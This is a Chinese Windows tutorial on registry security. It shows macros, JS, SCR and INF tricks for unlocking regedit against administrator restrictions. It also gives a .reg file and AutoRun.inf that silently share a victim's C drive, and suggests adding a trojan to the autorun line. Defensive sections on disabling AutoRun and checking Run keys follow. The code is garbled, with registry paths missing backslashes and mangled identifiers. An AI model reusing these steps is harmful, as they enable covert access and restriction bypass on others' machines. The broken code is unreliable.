IT貓撲網(wǎng):您身邊最放心的安全下載站! 最新更新|軟件分類|軟件專題|手機(jī)版|論壇轉(zhuǎn)貼|軟件發(fā)布

您當(dāng)前所在位置: 首頁操作系統(tǒng)windows → 精簡注冊表高級用法——安全篇

精簡注冊表高級用法——安全篇

時間:2015-06-28 00:00:00 來源:IT貓撲網(wǎng) 作者:網(wǎng)管聯(lián)盟 我要評論(0)

  筆者發(fā)現(xiàn)現(xiàn)在介紹注冊表的書籍的重點內(nèi)容都講解注冊表關(guān)于個性化設(shè)置和系統(tǒng)優(yōu)化等部分,而對于現(xiàn)實網(wǎng)絡(luò)環(huán)境下日益猖獗的"黑客"行為、木馬病毒以及那些令人惡心的惡意網(wǎng)站卻關(guān)注甚少。筆者在此就注冊表有關(guān)安全內(nèi)容略加闡述,希望能起拋磚引玉之效。

  一、注冊表與"黑客"行為

  "黑客"利用注冊表主要包括:

  A:突破部分網(wǎng)管軟件限制

  B:共享特定硬盤分區(qū)并運行指定程序

  C:啟動黑客程序等三方面,而其中又屬B、C兩方面危害較大。

  1、突破部分網(wǎng)管軟件限制

  現(xiàn)在流行的網(wǎng)管軟件基本上都可以對PC機(jī)采取隱藏桌面和硬盤特定分區(qū)、禁止修改IE瀏覽器、隱藏"開始"工具欄,封鎖注冊表編輯器regedit.exe等諸多限制,有的網(wǎng)吧管理員甚至到了變態(tài)的地步。于是"自由的戰(zhàn)士"便開始利用注冊表進(jìn)行大突圍。
570_2004110309260650342600.gif
  Word也可以給注冊表解鎖?沒錯!我們利用的是微軟在Word中提供的"宏",沒想到吧?具體方法是:運行Word,然后編寫如下面所示的這個"Unlock"宏,即可給注冊表解鎖:

  Sub Unlock()

  Dim RegPath As String

  RegPath="HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"

  System.PrivateProfileString(FileName:="",Section:=RegPath,Key:="Disableregistrytools")="OK!"

  End Sub

 ?、塾胻、VBt腳本語言解鎖

  腳本語言解鎖注冊表,這個沒的說,很多惡意網(wǎng)站就是靠它來鎖住我們的注冊表,現(xiàn)在我們反其道行之用它來解鎖注冊表。這里只給出t的核心代碼。用記事本編輯如下內(nèi)容的文件,保存為以.js為后綴名的任意文件,使用時雙擊就可以了。

  VAR WSHShell=WT.CREA-TOBJEt("WT.SHELL");

  WSHShell.Popup("解鎖注冊表");

  WSHShell.RegWrite("HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies

  systemDisableRegistryTools", 0,"reg_dword");

  需要注意:用JS對鍵值進(jìn)行操作時要用兩斜杠"",并且要用";"表示結(jié)束.

  ④利用SCR文件給注冊表解鎖

  眾所周知,SCR文件是屏保文件,SCR文件如何用來解鎖注冊表呢?方法是將注冊表編輯器regedit.exe改名為Regedit.scr。然后,在桌面上點擊鼠標(biāo)右鍵,在彈出菜單中選擇"屬性",在彈出的"顯示屬性"對話框中選中"屏幕保護(hù)程序",在"屏幕保護(hù)程序"下拉列表框中找到Regedit這個"屏保文件"(圖1),最后點擊"預(yù)覽"按紐,你會發(fā)現(xiàn)注冊表編輯器成功地打開了。再更改相關(guān)鍵值,重啟計算機(jī)后就可以給注冊表解鎖了?。ㄓ浿裇CR文件改回哦?。?center>
570_2004110309260653249000.gif
⑤用INF文件解鎖

  
  在Windows中有一種后綴為INF的驅(qū)動安裝文件,它實際上是一種腳本語言,通過解釋來執(zhí)行。它包含了設(shè)備驅(qū)動程序的所有安裝信息,其中也有涉及修改注冊表的相關(guān)語句,所以我們也可以利用INF文件對注冊表解鎖。

  [Version]

  Signature="$CHICAGO$"

  [DefaultInstall]

  DelReg=UnLock

  [UnLock]

  HKCU,SoftwareMicrosoftWindowsCurrentVersionPolicies

  System,Disableregistrytools,

  1,00,00,00,00

  將上面的內(nèi)容另存為后綴名是.inf的文件,使用時只要右鍵點擊它,在彈出菜單中選擇"安裝"即可給注冊表解鎖(如圖2)。
570_2004110309260656224500.gif
首先我們打開記事本編輯reg文件如下:

  

  REGEDIT4

  [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows

  CurrentVersionNetworkLanmanC$]

#p#副標(biāo)題#e#

  //這里我只共享了C盤,需要的可以再加

  "Path"="C:"

  "Remark"=" "

  "Type"=dword:00000000

  "Flags"=dword:00000192

  "Parm1enc"=hex:

  "Parm2enc"=hex:

  然后另存為ShareDrives.reg文件。 再打開記事本,鍵入以下內(nèi)容:

  [AutoRun]

  open=regedit /s ShareDrives.reg // 這里/s參數(shù)作用是導(dǎo)入注冊表信息不顯示任何提示

  再另存為AutoRun.inf文件。

  將這兩個文件復(fù)制到對方共享出來的驅(qū)動盤根目錄下,此后只要雙擊共享出來的驅(qū)動盤就會自動將ShareDrives.reg文件導(dǎo)入注冊表,對方重啟系統(tǒng)后C盤也就共享出來了。試想想,我們?nèi)绻?open=…"句后添上木馬名并將已配置好的木馬服務(wù)端一起復(fù)制過去,以后會怎樣?

  那么如何對付這種攻擊呢?因為硬盤根目錄下基本不需要AutoRun.inf文件來運行程序,因此我們可以采用一個一勞永逸的辦法就是將硬盤的AutoRun功能完全關(guān)閉,這樣即使硬盤根目錄下有AutoRun.inf文件,操作系統(tǒng)也不會運行指定的程序。Win98為例,打開注冊表編輯器,找到[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer]主鍵,在注冊表編輯器右側(cè)框中可以看到有二進(jìn)制值"NoDriveTypeAutoRun",最后只需要將其數(shù)據(jù)數(shù)值由默認(rèn)的"950000 00"改為"9d 00 00 00"就可以了。其原理我就不在講解了。

  3、啟動黑客程序

  利用注冊表啟動黑客程序,目的是想每次開機(jī)啟動時自動運行黑客程序,這同時也是很多木馬病毒自啟動常用的方法之一。普遍的方法是在將黑客程序名及參數(shù)添加到注冊表相應(yīng)的鍵值下,這樣一來,每次開機(jī)時計算機(jī)將自動加載相應(yīng)的注冊表項,進(jìn)而使黑客程序達(dá)到常駐內(nèi)存的目的。另外還有更為隱蔽的方法會在"注冊表與木馬病毒"部分詳細(xì)介紹。

  下面我們打開注冊表編輯器,查看:

  HKEY_LOCAL_MACHINESoftwareMicrosoft

  WindowsCurrentVersion下所有以"run"開頭的鍵值;

  HKEY_CURRENT_USERSoftwareMicrosoft

  WindowsCurrentVersion下所有以"run"開頭的鍵值;

  HKEY_USERS.DefaultSoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值。

  如果發(fā)現(xiàn)未知不明的鍵值,可很有可能就是非法植入的程序。

  二、注冊表與病毒

  下面我們來看看病毒是如何利用注冊表的。一般,病毒會利用注冊表來得到系統(tǒng)的基本信息,例如操作系統(tǒng)類型、系統(tǒng)安裝的服務(wù)程序、IE、OutLook等應(yīng)用軟件的版本信息等等。這主要是為了探測系統(tǒng)及軟件本身的漏洞然后加以利用。更主要的,病毒是想通過注冊表實現(xiàn)黑客程序一樣的目的——開機(jī)自啟,常駐內(nèi)存。只有這樣,病毒才能感染其他機(jī)器和文件,才有機(jī)會進(jìn)行"破壞"。

  打開注冊表編輯器,我們找到:

  HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值;

  HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值;

  HKEY_USERS.DefaultSoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值。

  大部分病毒都會悄悄的在上述三個位置安家。這時我們只需要刪除相應(yīng)的鍵值再刪除掉病毒程序就可以了。

  此外,病毒還可以把自己注冊為系統(tǒng)服務(wù)來達(dá)到更為隱蔽的開機(jī)自啟的目的。其基本原理是利用在WIN2K中,"啟動類型"設(shè)置為"自動"的服務(wù),啟動時系統(tǒng)就會自動運行,所以,病毒只需將自身添加到系統(tǒng)服務(wù)中,并將"啟動類型"設(shè)置為"自動"就可以每次啟動系統(tǒng)時都自動運行病毒程序。其在注冊表中的位置如下:[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesServiceNamemeters]

  "Application"= "C:winntsystem32 ServiceName.exe

關(guān)鍵詞標(biāo)簽:注冊表

相關(guān)閱讀

文章評論
發(fā)表評論

熱門文章 如何修改服務(wù)器3389端口 如何修改服務(wù)器3389端口 Win11系統(tǒng)怎么設(shè)置中文-Win11更改成中文的方法教程 Win11系統(tǒng)怎么設(shè)置中文-Win11更改成中文的方法教程 Win11怎么設(shè)置同步時間-Win11手動同步時間操作方法 Win11怎么設(shè)置同步時間-Win11手動同步時間操作方法 Win11怎么在開始菜單添加快捷方式-開始菜單添加快捷方式操作方法 Win11怎么在開始菜單添加快捷方式-開始菜單添加快捷方式操作方法

相關(guān)下載

    人氣排行 [聲音故障]XP沒有聲音,丟失Windows Audio服務(wù)(AudioSrv)[警告:2003不一定適用 解決Windows 7黑屏的有效方法 windows2003中關(guān)于軟路由設(shè)置方法的具體介紹 Windows不能在本地計算機(jī)啟動OracleDBConsoleorcl 一個空文件夾刪不掉的解決辦法 微軟Windows錯誤代碼大全(2) 用Windows命令行實現(xiàn)自動SSH代理 Windows 7加XP的局域網(wǎng)搭建與文件共享